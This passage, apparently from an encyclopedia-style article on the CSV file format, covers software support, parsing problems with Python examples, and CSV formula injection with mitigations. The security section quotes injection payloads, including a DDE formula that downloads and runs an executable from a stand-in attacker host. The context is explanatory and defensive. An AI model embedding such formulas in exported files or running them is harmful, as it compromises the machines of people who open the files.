CSV integrates into web-based applications for bulk data uploads, particularly in email marketing where contact lists are exchanged via APIs or forms. Tools like Klaviyo allow users to import CSV files containing subscriber emails, names, and custom properties to segment audiences and personalize campaigns at scale. In API-driven scenarios, such as Adobe Sign's bulk send feature, CSV files define recipient details for automated document distribution, streamlining high-volume communications. This application extends to contact management in customer relationship systems, where CSV uploads facilitate rapid population of databases from external sources.
In modern machine learning pipelines, CSV facilitates dataset sharing for training and evaluation, serving as a portable format for tabular data exchange among collaborators. Azure Machine Learning, for example, uses CSV files to upload and explore datasets like credit card transaction records, enabling preprocessing steps within cloud-based workflows. Researchers often export training data from databases or experiments into CSV for distribution via repositories, ensuring compatibility with libraries like pandas in Python for ingestion into models. This practice supports collaborative projects by allowing datasets to be versioned and shared without proprietary formats, though it requires attention to encoding for large-scale transfers.
Software Support
Spreadsheet software provides robust support for CSV files, enabling users to import, edit, and export data in this format. Microsoft Excel, a widely used tool, supports up to 1,048,576 rows and 16,384 columns per worksheet when handling CSV files, a limit consistent across versions including Excel 2016 and later.[20] Additionally, Excel introduced native support for opening and saving CSV files in UTF-8 encoding starting with the 2019 version, improving handling of international characters without requiring manual encoding adjustments.[21] Google Sheets, another popular option, accommodates up to 10 million cells across its spreadsheets when importing CSV data, with no strict row limit but constraints based on total cell usage to maintain performance.[22]
In programming environments, libraries facilitate efficient reading, writing, and manipulation of CSV files. Python's built-in csv module, part of the standard library since version 2.3, offers functions like csv.reader() and csv.writer() for parsing and generating CSV data, supporting dialects for varying formats and handling quoting and escaping automatically.[2] For more advanced data analysis, the pandas library provides high-level functions such as pd.read_csv() and DataFrame.to_csv(), which integrate with DataFrames for operations like filtering, aggregation, and large-scale processing, making it a staple in data science workflows.[23] In Java, the OpenCSV library serves as a comprehensive parser, enabling bean mapping, custom delimiters, and error handling for both reading from and writing to CSV files, with versions up to 5.x supporting modern Java features like streams.[24]
Database systems integrate CSV support for bulk data operations, streamlining import and export processes. PostgreSQL's COPY command allows efficient loading of CSV data into tables using syntax like COPY table_name FROM 'file.csv' WITH (FORMAT CSV, HEADER true), which handles quoting, escaping, and delimiters while supporting large-scale imports without row limits beyond system resources.[25] Similarly, MySQL's LOAD DATA INFILE statement facilitates bulk CSV ingestion with options for field terminators and enclosures, as in LOAD DATA INFILE 'file.csv' INTO TABLE table_name FIELDS TERMINATED BY ',' ENCLOSED BY '"', enabling high-performance data transfer for databases handling millions of records.[26]
Cloud services have increasingly incorporated CSV handling for scalable data storage and processing as of 2025. Amazon Web Services (AWS) S3 supports CSV files as a core component of data lakes, allowing storage of semi-structured data alongside tools like AWS Glue for cataloging and querying, which facilitates integration with analytics services for petabyte-scale CSV-based workflows.[27]
Challenges and Limitations
Parsing Issues
One common parsing issue with CSV files arises from inconsistent quoting practices, which can cause field misalignment and incorrect record boundaries. For example, if a field contains a newline character and is not enclosed in quotes, parsers interpret the newline as a record separator, fragmenting a single logical row across multiple lines. The CSV specification requires that fields containing line breaks, commas, or double quotes be enclosed in double quotes, with internal double quotes escaped by doubling them (e.g., "field with ""quote"""), but many file generators, including certain spreadsheet applications, quote only fields that contain commas, leading to misalignment when newlines or quotes appear unexpectedly.[1][28] This deviation from the rules outlined in RFC 4180 often results in errors during import into databases or analysis tools, where unquoted newlines split records erroneously.[1]
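The quoting rules can be seen in a short round trip using Python's standard csv module. This is a minimal sketch with made-up sample rows: the writer's default settings quote any field containing a comma, a double quote, or a line break and double the embedded quotes, while naive line splitting of the same text breaks a record in two.

```python
import csv
import io

# Made-up sample data: one field holds quotes and a comma, another a line break.
rows = [
    ["id", "comment"],
    ["1", 'She said "hello", then left'],
    ["2", "first line\nsecond line"],
]

# Write with the default dialect (minimal quoting, doubled double quotes).
buffer = io.StringIO(newline="")
csv.writer(buffer).writerows(rows)
encoded = buffer.getvalue()

# Naive splitting treats the embedded newline as a record boundary.
naive_records = encoded.splitlines()

# A quote-aware parser recovers the original three records.
parsed = list(csv.reader(io.StringIO(encoded, newline="")))

print(encoded)
print(len(naive_records), "lines from naive splitting;", len(parsed), "records from csv.reader")
```

The same data therefore yields four "lines" but only three records, which is why line-oriented tools are a frequent source of misaligned imports.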
Encoding mismatches further complicate CSV parsing, as the format lacks a mandated character encoding, allowing files to be produced in diverse schemes like UTF-8 or legacy codepages such as Windows-1252 (CP1252). When a parser defaults to an incorrect encoding, non-ASCII characters, such as accented letters or symbols in international data, can become corrupted, appearing as mojibake (garbled text) or replacement characters like question marks. For instance, a UTF-8 encoded file containing "café" read as CP1252 renders as "cafÃ©", corrupting the data.[28] This issue is exacerbated by tools like Microsoft Excel, which historically save CSVs using system-specific codepages rather than UTF-8, and by the optional Byte Order Mark (BOM) in Unicode files, whose handling varies across parsers.[28] To mitigate this, files should be explicitly encoded in UTF-8 without a BOM for broad compatibility, and parsers should allow the encoding to be specified as a parameter.[2]
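Both failure modes are easy to reproduce. The following Python sketch, using made-up sample data, decodes UTF-8 bytes with the wrong codec to produce mojibake, and then shows how a leading BOM leaks into the first header name unless a BOM-aware codec such as Python's "utf-8-sig" is used.

```python
import csv
import io

original = "name,city\ncafé,Zürich\n"
utf8_bytes = original.encode("utf-8")

# Decoding UTF-8 bytes as Windows-1252 raises no error here; it silently garbles the text.
garbled = utf8_bytes.decode("cp1252")

# Some tools prepend a UTF-8 byte order mark (BOM) to the file.
with_bom = b"\xef\xbb\xbf" + utf8_bytes

# Plain "utf-8" keeps the BOM as U+FEFF at the start of the first header name.
plain_utf8 = with_bom.decode("utf-8")

# "utf-8-sig" strips the BOM if present and otherwise behaves like "utf-8".
text = with_bom.decode("utf-8-sig")
rows = list(csv.reader(io.StringIO(text, newline="")))

print(garbled.splitlines()[1])
print(rows)
```

When reading from disk, the same codec names can be passed as the encoding argument of open().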
Dialect detection failures in parsing tools add another layer of difficulty, as CSV variants often use non-standard delimiters (e.g., semicolons or tabs instead of commas) or inconsistent header presence, requiring manual configuration to avoid misinterpretation. Automated detection can falter on ambiguous files, such as those with quoted fields containing delimiter characters or with irregular row lengths, leading to incorrect column mapping. Best practices recommend employing standardized parsers with built-in detection mechanisms, such as Python's csv.Sniffer class, whose sniff() method analyzes a sample of the file supplied by the caller (commonly the first 1,024 bytes or so) to infer the delimiter and quoting style, and whose has_header() method guesses whether the first row is a header by comparing it with the types and lengths of the values in the rows below it.[29] Despite its utility, csv.Sniffer may require fallback to manual dialect specification (e.g., via csv.register_dialect) for edge cases like embedded quotes or multiline fields.[2]
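A minimal sketch of this detect-then-fall-back pattern in Python follows. The sample data and the dialect name "semicolon" are assumptions chosen for illustration; restricting the candidate delimiters passed to sniff() is one way to make the heuristic less likely to pick an arbitrary character.

```python
import csv
import io

# Made-up sample in a European-style dialect: semicolon fields, comma decimals.
sample = (
    "name;price;qty\n"
    "widget;3,14;10\n"
    "gadget;2,50;4\n"
    "gizmo;10,00;7\n"
)

try:
    # Limit the candidates so the heuristic only considers plausible delimiters.
    dialect = csv.Sniffer().sniff(sample, delimiters=";,\t|")
except csv.Error:
    # Fallback: a manually registered dialect (the name "semicolon" is our own).
    csv.register_dialect("semicolon", delimiter=";", quotechar='"')
    dialect = csv.get_dialect("semicolon")

rows = list(csv.reader(io.StringIO(sample, newline=""), dialect))
print(repr(dialect.delimiter), rows[1])
```

Because the result is a heuristic guess, it is usually worth checking it against an expected column count before processing the full file.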
Security Concerns
CSV injection, also known as formula injection, poses a significant security risk when untrusted data is embedded in CSV files without proper sanitization, allowing malicious formulas to execute upon import into spreadsheet applications like Microsoft Excel or LibreOffice Calc.[30] Attackers exploit this by injecting payloads starting with characters such as =, +, -, or @, which spreadsheet software interprets as executable formulas rather than plain text.[31] For instance, a field containing =CMD|' /C calc'!A0 could launch the Windows calculator when the CSV is opened, or more dangerously, =shell|'Invoke-WebRequest "http://evil.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1 might download and execute remote malware.[32]
The absence of inherent schema validation in the CSV format exacerbates these vulnerabilities, as it permits unexpected data types or structures to be inserted without enforcement, potentially leading to unintended formula execution or data corruption during processing.[33] Without predefined rules for field contents, applications exporting CSV files from user inputs—common in data interchange scenarios—may inadvertently propagate malicious elements, enabling exploits like data exfiltration or system compromise when files are shared or downloaded.[30] This lack of validation also heightens risks in environments where CSV files handle sensitive information, as attackers can manipulate inputs to bypass basic security checks.[31]
To mitigate CSV injection, developers should sanitize inputs by detecting and neutralizing dangerous characters (e.g., via regex patterns like /^[=+\-@]/) and prefixing suspect fields with a single quote (') to force text interpretation, or wrapping all fields in double quotes while escaping internal quotes.[32] Employing secure parsers that validate data types and reject formula-like strings, combined with server-side input filtering, is essential; additionally, modern spreadsheet tools like Excel include protections such as prompts for external content and disabled dynamic data exchange (DDE) by default since 2018 updates, though users must remain vigilant against renaming files to bypass warnings.[33] Organizations are advised to avoid exporting untrusted data directly to CSV and instead use formats with built-in validation or implement logging to track potential injection attempts.[34]
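The prefixing and quoting steps can be sketched in Python as follows. The helper names neutralize and write_safe_csv are hypothetical, and the prefix list covers only the four characters named above; this is an illustration of the approach rather than a complete defense, and it should be combined with the server-side filtering described in the text.

```python
import csv
import io

# Leading characters that spreadsheet applications may treat as the start of a formula.
FORMULA_PREFIXES = ("=", "+", "-", "@")


def neutralize(value):
    """Prefix formula-like cell text with a single quote so it is read as text."""
    text = str(value)
    if text.startswith(FORMULA_PREFIXES):
        return "'" + text
    return text


def write_safe_csv(rows):
    """Serialize rows with every field quoted and formula-like cells neutralized."""
    buffer = io.StringIO(newline="")
    writer = csv.writer(buffer, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([neutralize(cell) for cell in row])
    return buffer.getvalue()


untrusted = [
    ["name", "note"],
    ["alice", "=CMD|' /C calc'!A0"],
    ["bob", "-42"],
]
safe_csv = write_safe_csv(untrusted)
print(safe_csv)
```

One trade-off of this simple rule is that legitimate values such as negative numbers are also prefixed, so an exporter may prefer to apply it only to free-text columns.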
Real-world incidents of CSV injection have been documented in phishing campaigns since 2017, often involving malicious attachments that exploit trusted sources to deliver payloads via exported reports or logs.[35] A notable case in Microsoft Azure involved attackers injecting formulas into activity logs, which administrators could download as CSV files and open in Excel, leading to command execution on the victim's machine; this vulnerability affected shared environments and highlighted risks for cloud-based data exports.[35] Similar exploits have targeted web applications and reporting tools, resulting in credential theft or malware deployment, underscoring the need for proactive sanitization in data-handling workflows.[32]